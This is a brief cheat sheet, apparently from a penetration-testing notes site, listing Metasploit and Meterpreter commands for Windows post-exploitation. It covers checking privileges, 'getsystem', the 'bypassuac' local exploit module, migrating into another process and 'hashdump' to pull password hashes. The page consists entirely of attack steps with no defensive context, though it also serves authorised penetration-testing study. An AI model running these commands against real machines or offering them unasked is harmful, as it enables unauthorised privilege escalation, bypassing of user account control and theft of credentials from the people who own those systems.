Windows
ps
getuid
getpid
getsystem
ps -U SYSTEM
CHECK UAC/Privileges
run post/windows/gather/win_privs
BYPASS UAC
Background the session first
exploit/windows/local/bypassuac
set session
After PrivEsc
migrate <pid>
hashdump
Last updated
Was this helpful?